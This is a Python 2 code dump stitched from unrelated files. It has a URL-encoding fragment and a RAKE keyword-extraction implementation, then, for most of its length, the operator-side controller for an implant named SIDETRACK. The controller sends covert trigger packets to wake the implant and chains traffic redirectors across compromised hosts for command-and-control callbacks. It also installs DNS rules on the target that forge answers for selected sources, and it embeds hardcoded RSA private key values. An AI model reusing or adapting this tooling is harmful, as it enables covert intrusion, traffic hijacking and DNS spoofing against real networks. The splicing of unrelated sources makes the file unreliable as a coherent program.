if hasattr(params, 'items'):
params = params.items()
return '&'.join(
(quote_plus(unicode(k).encode('utf8'), safe='/') + '=' + quote_plus(unicode(v).encode('utf8'), safe='/')
for k, v in params))
def remove_accents(input_str):
nkfd_form = unicodedata.normalize('NFKD', unicode(input_str))
return u"".join([c for c in nkfd_form if not unicodedata.combining(c)])
|
# Implementation of RAKE - Rapid Automtic Keyword Exraction algorithm
# as described in:
# Rose, S., D. Engel, N. Cramer, and W. Cowley (2010).
# Automatic keyword extraction from indi-vidual documents.
# In M. W. Berry and J. Kogan (Eds.), Text Mining: Applications and Theory.unknown: John Wiley and Sons, Ltd.
import re
import operator
debug = False
test = True
def is_number(s):
try:
float(s) if '.' in s else int(s)
return True
except ValueError:
return False
def load_stop_words(stop_word_file):
"""
Utility function to load stop words from a file and return as a list of words
@param stop_word_file Path and file name of a file containing stop words.
@return list A list of stop words.
"""
stop_words = []
for line in open(stop_word_file):
if line.strip()[0:1] != "#":
for word in line.split(): # in case more than one per line
stop_words.append(word)
return stop_words
def separate_words(text, min_word_return_size):
"""
Utility function to return a list of all words that are have a length greater than a specified number of characters.
@param text The text that must be split in to words.
@param min_word_return_size The minimum no of characters a word must have to be included.
"""
splitter = re.compile('[^a-zA-Z0-9_\\+\\-/]')
words = []
for single_word in splitter.split(text):
current_word = single_word.strip().lower()
#leave numbers in phrase, but don't count as words, since they tend to invalidate scores of their phrases
if len(current_word) > min_word_return_size and current_word != '' and not is_number(current_word):
words.append(current_word)
return words
def split_sentences(text):
"""
Utility function to return a list of sentences.
@param text The text that must be split in to sentences.
"""
sentence_delimiters = re.compile(u'[.!?,;:\t\\\\"\\(\\)\\\'\u2019\u2013]|\\s\\-\\s')
sentences = sentence_delimiters.split(text)
return sentences
def build_stop_word_regex(stop_word_file_path):
stop_word_list = load_stop_words(stop_word_file_path)
stop_word_regex_list = []
for word in stop_word_list:
word_regex = r'\b' + word + r'(?![\w-])' # added look ahead for hyphen
stop_word_regex_list.append(word_regex)
stop_word_pattern = re.compile('|'.join(stop_word_regex_list), re.IGNORECASE)
return stop_word_pattern
def generate_candidate_keywords(sentence_list, stopword_pattern):
phrase_list = []
for s in sentence_list:
tmp = re.sub(stopword_pattern, '|', s.strip())
phrases = tmp.split("|")
for phrase in phrases:
phrase = phrase.strip().lower()
if phrase != "":
phrase_list.append(phrase)
return phrase_list
def calculate_word_scores(phraseList):
word_frequency = {}
word_degree = {}
for phrase in phraseList:
word_list = separate_words(phrase, 0)
word_list_length = len(word_list)
word_list_degree = word_list_length - 1
#if word_list_degree > 3: word_list_degree = 3 #exp.
for word in word_list:
word_frequency.setdefault(word, 0)
word_frequency[word] += 1
word_degree.setdefault(word, 0)
word_degree[word] += word_list_degree #orig.
#word_degree[word] += 1/(word_list_length*1.0) #exp.
for item in word_frequency:
word_degree[item] = word_degree[item] + word_frequency[item]
# Calculate Word scores = deg(w)/frew(w)
word_score = {}
for item in word_frequency:
word_score.setdefault(item, 0)
word_score[item] = word_degree[item] / (word_frequency[item] * 1.0) #orig.
#word_score[item] = word_frequency[item]/(word_degree[item] * 1.0) #exp.
return word_score
def generate_candidate_keyword_scores(phrase_list, word_score):
keyword_candidates = {}
for phrase in phrase_list:
keyword_candidates.setdefault(phrase, 0)
word_list = separate_words(phrase, 0)
candidate_score = 0
for word in word_list:
candidate_score += word_score[word]
keyword_candidates[phrase] = candidate_score
return keyword_candidates
class Rake(object):
def __init__(self, stop_words_path):
self.stop_words_path = stop_words_path
self.__stop_words_pattern = build_stop_word_regex(stop_words_path)
def run(self, text):
sentence_list = split_sentences(text)
phrase_list = generate_candidate_keywords(sentence_list, self.__stop_words_pattern)
word_scores = calculate_word_scores(phrase_list)
keyword_candidates = generate_candidate_keyword_scores(phrase_list, word_scores)
sorted_keywords = sorted(keyword_candidates.iteritems(), key=operator.itemgetter(1), reverse=True)
return sorted_keywords
if test:
text = "Compatibility of systems of linear constraints over the set of natural numbers. Criteria of compatibility of a system of linear Diophantine equations, strict inequations, and nonstrict inequations are considered. Upper bounds for components of a minimal set of solutions and algorithms of construction of minimal generating sets of solutions for all types of systems are given. These criteria and the corresponding algorithms for constructing a minimal supporting set of solutions can be used in solving all the considered types of systems and systems of mixed types."
# Split text into sentences
sentenceList = split_sentences(text)
#stoppath = "FoxStoplist.txt" #Fox stoplist contains "numbers", so it will not find "natural numbers" like in Table 1.1
stoppath = "SmartStoplist.txt" #SMART stoplist misses some of the lower-scoring keywords in Figure 1.5, which means that the top 1/3 cuts off one of the 4.0 score words in Table 1.1
stopwordpattern = build_stop_word_regex(stoppath)
# generate candidate keywords
phraseList = generate_candidate_keywords(sentenceList, stopwordpattern)
# calculate individual word scores
wordscores = calculate_word_scores(phraseList)
# generate candidate keyword scores
keywordcandidates = generate_candidate_keyword_scores(phraseList, wordscores)
if debug: print keywordcandidates
sortedKeywords = sorted(keywordcandidates.iteritems(), key=operator.itemgetter(1), reverse=True)
if debug: print sortedKeywords
totalKeywords = len(sortedKeywords)
if debug: print totalKeywords
print sortedKeywords[0:(totalKeywords / 3)]
rake = Rake("SmartStoplist.txt")
keywords = rake.run(text)
print keywords
|
import base
import crypto
import echocmd
import string
import struct
import time
import re
import os
import sys
from socket import *
import rawtcp
import types
class SIDECMD(echocmd.ECHOCMD):
def __init__(self):
echocmd.ECHOCMD.__init__(self)
def TypeConvert(self, stype):
#print "In TypeConvert %d" % (stype)
if type(stype) != type(''):
if stype == 1:
stype = "A"
elif stype == 2:
stype = "NS"
elif stype == 3:
stype = "MD"
elif stype == 4:
stype = "MF"
elif stype == 5:
stype = "CNAME"
elif stype == 6:
stype = "SOA"
elif stype == 7:
stype = "MB"
elif stype == 8:
stype = "MG"
elif stype == 9:
stype = "MR"
elif stype == 10:
stype = "NULL"
elif stype == 11:
stype = "WKS"
elif stype == 12:
stype = "PTR"
elif stype == 13:
stype = "HINFO"
elif stype == 14:
stype = "MINFO"
elif stype == 15:
stype = "MX"
elif stype == 16:
stype = "TXT"
elif stype == 252:
stype = "AXFR"
elif stype == 253:
stype = "MAILB"
elif stype == 254:
stype = "MAILA"
elif stype == 255:
stype = "*"
return stype
def ConvertType(self, rtype):
if type(rtype) != type(0):
rtype = string.upper(rtype)
if rtype == "A":
rtype = 1
elif rtype == "NS":
rtype = 2
elif rtype == "MD":
rtype = 3
elif rtype == "MF":
rtype = 4
elif rtype == "CNAME":
rtype = 5
elif rtype == "SOA":
rtype = 6
elif rtype == "MB":
rtype = 7
elif rtype == "MG":
rtype = 8
elif rtype == "MR":
rtype = 9
elif rtype == "NULL":
rtype = 10
elif rtype == "WKS":
rtype = 11
elif rtype == "PTR":
rtype = 12
elif rtype == "HINFO":
rtype = 13
elif rtype == "MINFO":
rtype = 14
elif rtype == "MX":
rtype = 15
elif rtype == "TXT":
rtype = 16
elif rtype == "AXFR":
rtype = 252
elif rtype == "MAILB":
rtype = 253
elif rtype == "MAILA":
rtype = 254
elif rtype == "*":
rtype = 255
return rtype
def ClassConvert(self, rclass):
#print "In ClassConvert %d" % (rclass)
if type(rclass) != type(''):
if rclass == 1:
rclass = "IN"
elif rclass == 2:
rclass = "CS"
elif rclass == 3:
rclass = "CH"
elif rclass == 4:
rclass = "HS"
return rclass
def ConvertClass(self, rclass):
if type(rclass) != type(0):
rclass = string.upper(rclass)
if rclass == "IN":
rclass = 1
elif rclass == "CS":
rclass = 2
elif rclass == "CH":
rclass = 3
elif rclass == "HS":
rclass = 4
return rclass
def ConvertFlags(self, flags):
# qr rd ra
retFlags = 0
if type(flags) != type(0):
flags = string.upper(flags)
if flags == "RA":
retFlags = retFlags | 0x0080L
if flags == "AA":
retFlags = retFlags | 0x0400L
return retFlags
def SectionConvert(self,section):
if type(section) != type(''):
if section == 0:
section = "query"
elif section == 1:
section = "ans"
elif section == 2:
section = "auth"
elif section == 3:
section = "add"
return section
def ConvertSection(self,section):
if type(section) != type(0):
section = string.upper(section)
if section[:1] == "Q":
section = 0
elif section[:2] == "AN":
section = 1
elif section[:2] == "AU":
section = 2
elif section[:2] == "AD":
section = 3
return section
def NameConvertName(self, name):
ret = ''
sp = 0
if type(name) != type(0):
while name[sp:sp+1] != '\000':
namelen = struct.unpack("!H",'\000' + name[sp:sp+1])[0]
#print namelen
if sp != 0:
ret = ret + '.'
for i in range(1,namelen+1):
val = struct.unpack("!H", '\000' + name[sp+i:sp+i+1])[0]
if val >= 32 and val < 127:
ret = ret + name[sp+i:sp+i+1]
else:
raise TypeError, self.HexConvert(name)
sp = sp+1+namelen
return ret
def NameConvert(self, name, padding=0):
try:
return self.NameConvertName(name)
except:
return self.HexConvert(name, padding)
def ConvertName(self, name):
ret = ''
regExpr = re.compile("^[a-zA-Z0-9-_.]*$")
if type(name) != type(0x0L):
reg = regExpr.search(name)
if reg != None:
dots = string.splitfields(name,".")
for i in range(len(dots)):
ret = ret + chr(len(dots[i])) + dots[i]
ret = ret + '\000'
return ret
else:
return name
else:
return struct.pack("!H",name)
def FlagConvert(self, flag):
if flag == 0:
return "Ignore"
elif flag == 1:
return "Count"
elif flag == 2:
return "Active"
def HexConvert(self,data,pad=0):
ret = ''
padding = ''
for i in range(pad):
padding = padding + ' '
for i in range(len(data)):
if i % 16 == 0 and i != 0:
ret = ret + '\n' + padding
myNum = struct.unpack("!H", '\000'+data[i:i+1])[0]
ret = ret + "%02x " % myNum
ret = ret + '\n' + padding + "(%d)" % (len(data))
return ret
class SIDETRACK(base.Implant):
def __init__(self, session, proto):
base.Implant.__init__(self, session, proto)
self.name = 'SIDETRACK'
self.newCV = None
self.targetopts = self.session.target.GetImplantOpts('sidetrack')
self.version = self.targetopts['VERSION']
if self.version >= 2.0:
self.cipher = crypto.rc6()
else:
self.cipher = crypto.rc5()
self.cipher.SetKey(self.targetopts['KEY'])
self.N = 0xdec9ba81a6b9ea70c876ad3413aa7dd57be75d42e668843b1401fd42015144231004bfab4e459dabdbb159665b48a4d72357c3630d0e911b5b96bf0b0d8ab83f4bb045a13ea2acc85d120c3539f206200b9931a41ad6141eb7212e66784880ff6f32b16e1783d4ca52fe5ec484ef94f019feaf58abbc5de6a62f10eec347ac4dL
self.d = 0x25219f159bc9a712cc13c788adf1bfa394a68f8b2666c0b48355aa35aae2e0b082ab754737b644f1f9f2e43bb9e170ce85e3f5e5d7826d848f43ca81d7971eb4e7a62bc8e5e0a549bcb9ecb216451f8ba32444a71cb0ff97a77500cb39f802968ae7c10366d3eed895b939ec54eb8c4c54329bddb0eb00e691bc6b5d10d5af05L
self.Nsign = 0xb2003aac88a36d45d840bc748aa972b3f2e69a29f43f1e2faf810d9172db756d4843492489781764688d29c3a547a1522702d20e10f426149ac2f323bf35dfa1cb036f467109fd321bae03711eab16b210ed131ac077113f1dd34be480508708893c1a40fdc1b1d637e1cf3efd13e6bbbdc88a8c2fc103a45c490ba933a79a31L
self.dsign = 0x076aad1c85b179e2e902b284db1c64c77f74466c6a2d4beca7500b3b64c924e48dad786185ba564ed9b08c6826e2fc0e16f5736b40b4d6eb8672ca217d4ce95156a1920e3e48fe1dfe82738bb6ec985c441421d188962b141d3113773e8006b1273de6b846635ff7979547b516d7c426d5c3b0e2505150095b81e266e3b97c03L
self.packetSize = 450
self.timediff = self.session.target.timediff
self.localRedir = None
self.parent = None
self.children = []
self.rules = []
def RegisterCommands(self):
self.AddCommand('ping', echocmd.ECHOCMD_PING)
self.AddCommand('status', echocmd.ECHOCMD_STATUS)
self.AddCommand('done', echocmd.ECHOCMD_DONE)
self.AddCommand('setsize', echocmd.ECHOCMD_SETSIZE)
self.AddCommand('timediff', echocmd.ECHOCMD_TIMEDIFF)
self.AddCommand('incision', echocmd.ECHOCMD_INCISION)
self.AddCommand('rekey', echocmd.ECHOCMD_REKEY)
self.AddCommand('switchkey', echocmd.ECHOCMD_SWITCHKEY)
self.AddCommand('origkey', echocmd.ECHOCMD_ORIGKEY)
self.AddCommand('key', echocmd.ECHOCMD_KEY)
self.AddCommand('init', SIDECMD_INIT)
self.AddCommand('dnsadd', SIDECMD_DNSADD)
self.AddCommand('dnsrm', SIDECMD_DNSREMOVE)
self.AddCommand('dnsset', SIDECMD_DNSSET)
self.AddCommand('dnsaction', SIDECMD_DNSACTION)
self.AddCommand('dnsraw', SIDECMD_DNSRAW)
self.AddCommand('dnslist', SIDECMD_DNSLIST)
self.AddCommand('dnsload', SIDECMD_DNSLOAD)
self.AddCommand('dnssave', SIDECMD_DNSSAVE)
self.AddCommand('rediradd', SIDECMD_REDIRADD)
self.AddCommand('redirlist', SIDECMD_REDIRLIST)
self.AddCommand('redirset', SIDECMD_REDIRSET)
self.AddCommand('redirrm', SIDECMD_REDIRREMOVE)
self.AddCommand('connlist', SIDECMD_CONNLIST)
self.AddCommand('connrm', SIDECMD_CONNREMOVE)
self.AddCommand('stunload', SIDECMD_UNLOAD)
self.AddCommand('connect', SIDECMD_CONNECT)
self.AddCommand('cclist', SIDECMD_CCLIST)
self.AddCommand('ccremove', SIDECMD_CCREMOVE)
self.AddCommand('multiaddr', SIDECMD_MULTIADDR)
##########################################################################
# HASANOTHERADDRESS class
#########################################################################
class SIDECMD_MULTIADDR(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "multiaddr"
self.usage = "multiaddr <0|1>"
self.info = "Let pyside know that the target has multiple addresses"
def run(self, value=1):
self.implant.session.target.hasAnotherAddress = value
return (1, "Value updated")
##########################################################################
# CONNECT class
#########################################################################
class SIDECMD_CONNECT(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "connect"
self.usage = "connect <listen_address>:<listen_port>/<callback_port> <trigger_port>"
self.info = "Connect to SIDETRACK"
def parseHostInfo(self,host):
#split the ip from the ports
res = string.split(host,":")
if len(res) == 1:
raise ValueError, host
elif len(res) == 2:
ports = string.split(res[1],"/")
if len(ports) != 2:
raise ValueError, host
if ports[0] == "*":
raise ValueError, ports[0]
else:
ports[0] = eval(ports[0])
if ports[1] == "*":
raise ValueError, ports[1]
else:
ports[1] = eval(ports[1])
try:
host = None
ipaddr = self.ConvertIP(res[0])
except:
# host references a session
host = base.sessionDict[res[0]]
ipaddr = self.ConvertIP(host.target.GetIP())
return host,ipaddr,ports[0],ports[1]
else:
raise ValueError, host
def run(self,hostinfo,fport):
# Parse the ports
prevRule = None
tempRule = None
localRedir = None
host,laddr,lport,cbport = self.parseHostInfo(hostinfo)
if fport == 0:
PORT = 500
#open the listener
try:
sock = socket(AF_INET,SOCK_STREAM,0)
sock.bind(('',lport))
sock.listen(2)
except error, message:
return (0, "Could not open port %d %s" % (lport,message))
# See if the user entered another host
if host != None:
self.implant.parent = host
#hpn is the hop prior to host (might just be "me")
hpn = host.implant.parent.name
myname = host.name
hostinfo = re.sub(myname,hpn,hostinfo)
# Testing
localRedir = REDIRECT(self,0,10800,10800,6,\
self.ConvertIP(self.implant.session.target.ip), \
self.ConvertIP(self.implant.session.target.ip),
0,0,0,(0,0,0,0),0,0x201,lport,cbport,0,0)
localRedir.add(0)
self.implant.session.localRedir = localRedir
# Add a redirect (on the previous host) for this connection
cmd = host.GetCommand('rediradd')
base.ccSupport = 1
res = cmd.run("tcp",hostinfo,"%s:%d/%d"%(self.implant.session.target.ip,cbport,lport),"-tfix", "-afix","-l","3h","-c","3h")
base.ccSupport = 0
if res[0] == 0:
return res
# Let the previous implant know this redirect rule is in support
# of a command and control connection
prevRule = cmd.redir
if prevRule != None:
prevRule.ccPassthru = self.implant.session
# Add a temporary rule to allow the trigger to be passed to target
base.ccSupport = 1
if fport == 0:
res = cmd.run("udp","%s:%d/%d"%(hpn,PORT,PORT),"%s:%d/%d"%(self.implant.session.target.ip,PORT,PORT),"-tfix", "-afix")
else:
res = cmd.run("tcp","%s:%d/%d"%(hpn,0,fport),"%s:%d/%d"%(self.implant.session.target.ip,fport,0),"-tfix")
base.ccSupport = 0
base.db(2,"%d.%d.%d.%d"%(res[2] >> 24, (res[2] >> 16) & 0xff, (res[2] >> 8) & 0xff, res[2] & 0xff))
if res[0] == 0:
if prevRule != None:
prevRule.remove()
return (0, "Unable to establish redir for port %d: %s"%(fport,res[1]))
tempRule = cmd.redir
else:
localRedir = None
prevRule = None
self.implant.session.localRedir = None
#add the rule
if tempRule == None or (tempRule != None and \
cmd.implant.session.target.hasAnotherAddress == 0):
rule = base.redir.listen(laddr,\
self.ConvertIP(self.implant.session.target.ip),\
fport,lport,cbport,\
self.implant.timediff, \
self.implant.cipher.GetKey())
else:
rule = base.redir.listen(tempRule.ST_ip,\
self.ConvertIP(self.implant.session.target.ip),\
fport,lport,cbport,\
self.implant.timediff, \
self.implant.cipher.GetKey())
#Make the connection
if fport == 0:
conn = socket(AF_INET,SOCK_DGRAM,0)
conn.bind(('',PORT))
conn.connect((self.implant.session.target.ip,PORT))
f = os.popen("dd if=/dev/urandom bs=128 count=3 2>/dev/null")
d = f.read()
f = None
data = d[0:14] + struct.pack("HBBBB", 0, 0x08, 0x10, 0x20, 0x01) + \
d[16:20] + struct.pack("!L", 0x154) + d[20:332]
conn.send(data)
conn.close()
#accept
self.implant.protocol.sock,addr = sock.accept()
else:
#conn = socket(AF_INET,SOCK_STREAM,0)
# STUB: Catch this in a try statement
try:
# esev - 6/24/03
#conn.connect((self.implant.session.target.ip,fport))
#conn.close()
#conn = None
rawtcp.sendFakeConnection(self.implant.session.target.ip,fport)
# STUB: Put a timeout here
#accept
self.implant.protocol.sock,addr = sock.accept()
except:
base.redir.delete(rule)
sock.close()
sock = None
#if conn != None:
# conn.close()
if localRedir != None:
localRedir.remove()
if prevRule != None:
prevRule.remove()
if tempRule != None:
tempRule.remove()
base.sessionDict[self.implant.session.name] = None
return (1,"Canceled by user, target %s removed" % self.implant.session.name)
sock.close()
sock = None
# Set the CC redirect to inactive. This will not effect the
# current connection..only prevent the rule from getting in the way
if prevRule != None:
prevRule.set(0)
#if there is a connection back return 1 else 0
if self.implant.protocol.sock:
cmd = self.implant.session.GetCommand("init")
res = cmd.run()
# remove the temporary redirect
if tempRule != None:
tempRule.remove()
# remove the connection rule
base.redir.delete(rule)
if res[0] == 0:
return res
else:
sys.stderr.write("%s\n"%(res[1]))
return (1, "Connected")
else:
# remove the temporary redirect
if tempRule != None:
tempRule.remove()
# remove the connection rule
base.redir.delete(rule)
return (0, "Could not connect")
##########################################################################
# INIT class
# op code: 0x20
#########################################################################
class SIDECMD_INIT(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "init"
self.usage = "init"
self.info = "Initialize the implant"
def run(self):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
cmd = self.implant.session.GetCommand("ping")
res = cmd.run()
if res[0] == 0:
return res
else:
sys.stderr.write("%s\n"%(res[1]))
for i in range(3):
cmd = self.implant.session.GetCommand("rekey")
res = cmd.run()
if res[0] != 0:
break
if res[0] == 0:
return res
else:
sys.stderr.write("%s\n"%(res[1]))
cmd = self.implant.session.GetCommand("switchkey")
res = cmd.run()
if res[0] == 0:
return res
else:
sys.stderr.write("%s\n"%(res[1]))
cmd = self.implant.session.GetCommand("status")
res = cmd.run()
if res[0] == 0:
return res
else:
sys.stderr.write("%s\n"%(res[1]))
return (1,"Initialization complete")
##########################################################################
# DNSREAD class
#########################################################################
class SIDECMD_DNSLOAD(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsload"
self.usage = "dnsload <filename>"
self.info = "Send DNS data from a file to the target"
#-------------------------------------------------------------------------
# Name : ProcessArg
# Purpose: Tests to see if the argument is a string or number
# Receive: arg - The argument to test
# Return : The original string if a number, or a quoted string if not
#-------------------------------------------------------------------------
def ProcessArg(self,arg):
if (re.match('^-?[0-9]*(\.[0-9]+)?$',arg) != None or \
re.match('^0x[0-9a-fA-F]+L?', arg) != None):
return arg
else:
return '"' + arg + '"'
def runRule(self, args):
cmd = SIDECMD_DNSADD()
cmd.implant = self.implant
argString = 'myRes = cmd.run('
for i in range(1,len(args)):
if i == 1:
argString = argString + self.ProcessArg(args[i])
else:
argString = argString + ", " + self.ProcessArg(args[i])
argString = argString + ')'
print argString
exec(argString)
if myRes and myRes[0]:
self.lastRule = myRes[0]
def runSet(self, args):
cmd = SIDECMD_DNSSET()
cmd.implant = self.implant
argString = 'myRes = cmd.run(self.lastRule'
for i in range(1,len(args)):
argString = argString + ", " + self.ProcessArg(args[i])
argString = argString + ')'
print argString
exec(argString)
def runCmd(self, args):
cmd = SIDECMD_DNSACTION()
cmd.implant = self.implant
argString = 'tmp = cmd.run(self.lastRule'
for i in range(len(args)):
argString = argString + ", " + self.ProcessArg(args[i])
argString = argString + ')'
print argString
exec(argString)
def run(self, filename):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
file = open(filename,'r')
self.lastRule = 0
while 1:
line = file.readline()
if not line:
line = None
return (1, "Input from file complete")
args = base.SplitCommandString(string.strip(line))
if len(args) == 0:
continue
elif args[0][0:1] == '#' or args[0] == '':
continue
elif args[0] == "rule":
self.runRule(args)
print "Rule %d added\n" % (self.lastRule)
elif args[0] == "set":
self.runSet(args)
else:
self.runCmd(args)
return (0, "problem")
##########################################################################
# DNSADD class
# op code: 0x18
#########################################################################
class SIDECMD_DNSADD(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsadd"
self.usage = "dnsadd <from ip> <from mask> <longevity> <type> <class> <name> [dns flags]"
self.info = "Add a DNS entry into sidetrack (see also dnsset)"
self.op = 0x18L
def run(self,ip,mask,length,rtype,rclass,name,flags=0x0080L):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
ipStr = self.ConvertIP(ip)
maskStr = self.ConvertIP(mask)
rtype = self.ConvertType(rtype)
rclass = self.ConvertClass(rclass)
name = self.ConvertName(name)
length = self.ConvertTime(length)
self.data = ipStr + maskStr + struct.pack("!LHHHH",length,flags,\
rtype,rclass,len(name)) +name
self.Query()
if( self.op == 0x18L and self.res == 0x1L ):
dnsRes = struct.unpack("!l",self.data[0:4])[0]
return (dnsRes, "Add successful, rule number: %d" % dnsRes)
else:
return (0, "Add failed")
##########################################################################
# DNSREMOVE class
# op code: 0x19
#########################################################################
class SIDECMD_DNSREMOVE(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsrm"
self.usage = "dnsrm <rule|all>"
self.info = "Remove a dns rule"
self.op = 0x19L
def run(self,rule):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
rule = 0
self.data = struct.pack("!l",rule)
self.Query()
if self.op == 0x19L and self.res == 0x01L:
return (1,"Rule(s) removed")
else:
return (0,"unable to remove rule(s)")
##########################################################################
# DNSSET class
# op code: 0x20
#########################################################################
class SIDECMD_DNSSET(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsset"
self.usage = "dnsset <rule> <ignore|count|active>"
self.info = "Turn a DNS rule on or off"
self.op = 0x20L
def run(self,rule,onoff):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
self.data = struct.pack("!l",rule)
if onoff[0:1] == "a" or onoff[0:1] == "A":
self.data = self.data + struct.pack("!h", 2)
elif onoff[0:1] == "c" or onoff[0:1] == "C":
self.data = self.data + struct.pack("!h", 1)
else:
self.data = self.data + struct.pack("!h", 0)
self.Query()
if self.op == 0x20L and self.res == 0x01L:
return (1,"rule %d successfully set to %s" %\
(rule, onoff))
else:
return (0,"unable to set rule to %s" % onoff)
##########################################################################
# DNSRAW class
# op code: 0x21
#########################################################################
class SIDECMD_DNSRAW(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsraw"
self.info = "Upload a binary dns response packet"
self.usage = "dnsraw <rule> <filename>"
self.op = 0x21L
def run(self, rule, filename):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0, msg)
file = open(filename,'r')
file.seek(0,2)
filesize = file.tell()
file.seek(0,0)
maxchunksize = self.implant.packetSize - 34
numchunks = filesize / maxchunksize
if filesize%maxchunksize > 0:
numchunks = numchunks + 1
for i in range(numchunks):
self.data = file.read(maxchunksize)
self.data = struct.pack("!LHHHH",rule,i,numchunks,4,\
len(self.data)) + self.data
self.Query()
if (self.op != 0x21L or self.res != 0x1L):
return (0,"Binary upload failed at chunk %d"%(i+1))
return (1,"Binary upload of %d chunks successful"%(numchunks))
##########################################################################
# DNSACTION class
# op code: 0x21
#########################################################################
class SIDECMD_DNSACTION(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsaction"
self.info = "Set the action for a rule"
self.usage = "dnsaction <rule> <ans|auth|add> <name> <type> <class> <ttl> <data>"
self.op = 0x21L
def run(self,rule,sect,name,rtype,rclass,ttl,data):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
name = self.ConvertName(name)
sect = self.ConvertSection(sect)
rtype = self.ConvertType(rtype)
rclass = self.ConvertClass(rclass)
ttl = self.ConvertTime(ttl)
if rtype == 1:
data = self.ConvertIP(data)
else:
data = self.ConvertName(data)
self.data = struct.pack("!LLHHHHH", rule, ttl, sect, rtype,\
rclass,\
len(name),\
len(data))+\
name+data
self.Query()
if self.op == 0x21L and self.res == 0x01L:
return (1,"%s action for rule %d set successfully" % \
(sect, rule))
else:
return (0,"Could not set action")
##########################################################################
# DNSLIST class
# op code: 0x22
#########################################################################
class SIDECMD_DNSLIST(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnslist"
self.usage = "dnslist [-v] [rule] [section]"
self.info = "Retrieve a section of a rule from SIDETRACK"
self.op = 0x22L
def ParseReturn(self):
if self.implant.version < 2.0:
self.lastport = 0
(self.retVal, self.rule, self.fromIP, self.fromMask, self.longevity,\
self.lastIP, self.lastTime, self.seen, self.flag, self.ttl, \
self.dnsflags, self.rtype, self.rclass, self.rsec, \
self.nlen, self.dlen) =\
struct.unpack("!lLLLLLLHHLHHHHHH", self.data[0:48])
self.dnsname = self.data[48:48+(self.nlen)]
self.dnsdata = self.data[48+(self.nlen):48+(self.nlen)+(self.dlen)]
else:
(self.retVal, self.rule, self.fromIP, self.fromMask, self.longevity,\
self.lastIP, self.lastTime, self.seen, self.flag, self.lastport, \
self.dnsflags, self.ttl, self.rtype, self.rclass, self.rsec, \
self.nlen, self.dlen) =\
struct.unpack("!lLLLLLLHHHHLHHHHH", self.data[0:50])
self.dnsname = self.data[50:50+(self.nlen)]
self.dnsdata = self.data[50+(self.nlen):50+(self.nlen)+(self.dlen)]
def GetRuleString(self):
printOut = "%10d %s/%s %-7s %s\n" % \
(self.rule,
self.ConvertToDot(self.fromIP),
self.ConvertToDot(self.fromMask),
self.FlagConvert(self.flag),
time.ctime(self.longevity+self.implant.timediff)[4:])
printOut = printOut + " %5s: %-5d %s:%d %s\n" %\
("count",
self.seen,
self.ConvertToDot(self.lastIP),
self.lastport,
time.ctime(self.lastTime + self.implant.timediff))
return printOut + self.GetSectionString()
def GetRule(self,rule,sec=0):
sec = self.ConvertSection(sec)
#print "Getting section %d of rule %d\n" % (sec,rule)
self.data = struct.pack("!LLH",rule,0,sec)
self.Query()
if self.op == 0x22L and self.res == 0x01L:
self.ParseReturn()
printOut = self.GetRuleString()
return (1, printOut)
else:
return (0,"Error receiving result\n")
def GetNextRule(self,lastRule,sec=0):
sec = self.ConvertSection(sec)
print "Getting section %d of rule after %d\n" % (sec,lastRule)
self.data = struct.pack("!LLH",0,lastRule,sec)
self.Query()
if self.op == 0x22L and self.res == 0x01L:
self.ParseReturn()
if self.retVal == 0:
lastRule = self.rule
elif self.retVal == 2:
lastRule = -2
else:
lastRule = -1
if lastRule == -2:
lastRule = -1
printOut = 'There are currently no rules'
else:
printOut = self.GetRuleString()
return (lastRule, printOut)
elif lastRule == 0:
print self.res
return (0,"There are currently no rules!")
else:
return (0,"Error receiving result\n")
def GetSectionString(self):
printOut = " %5s: %-5s %-3s %-5d " % \
(self.SectionConvert(self.rsec),
self.TypeConvert(self.rtype),
self.ClassConvert(self.rclass),
self.ttl&0xffffffL)
if self.nlen:
try:
printOut = printOut + "%s\n" % \
(self.NameConvertName(self.dnsname))
except:
printOut = printOut + "\n N: %s\n" %\
(self.HexConvert(self.dnsname,10))
if self.dlen:
if self.rtype == 1 and self.dlen == 4:
printOut = printOut + \
" D: %s\n" % \
(self.ConvertToDot(self.dnsdata))
else:
printOut = printOut + \
" D: %s\n" %\
(self.NameConvert(self.dnsdata,10))
return printOut
def GetSection(self,rule,section):
print "Getting section %d of rule %d\n" % (section,rule)
self.data = struct.pack("!LLH",rule,0,section)
self.Query()
if self.op == 0x22L and self.res == 0x01L:
self.ParseReturn()
if self.rsec == 4:
return (1, '')
return (1,self.GetSectionString())
else:
return (0, "Could not get section")
def preRuleString(self):
return "-----------------------------------------------------------------------\n"
def postRuleString(self):
return ''
def runAll(self):
moreRules = 1
lastRule = 0
printOut = ''
while moreRules:
res = self.GetNextRule(lastRule)
if res[0] == 0:
return res
elif res[0] == -1:
moreRules = 0
lastRule = self.rule
else:
lastRule = res[0]
printOut = printOut + self.preRuleString()
printOut = printOut + res[1]
for i in range(1,4):
sec = self.GetSection(lastRule, i)
if sec[0] == 0:
return (0, printOut)
printOut = printOut + sec[1]
printOut = printOut + self.postRuleString()
return (1, printOut)
def run(self,rule=-1, sec=-1, ext=-1):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if rule == -1:
lastRule = 0
moreRules = 1
printOut = ''
while moreRules:
res = self.GetNextRule(lastRule)
if res[0] == 0:
return res
elif res[0] == -1:
moreRules = 0
lastRule = self.rule
else:
lastRule = res[0]
printOut = printOut + res[1]
elif rule == "-v":
if sec == -1:
return self.runAll()
else:
if ext == -1:
res = self.GetRule(sec)
if res[0] == 0:
return res
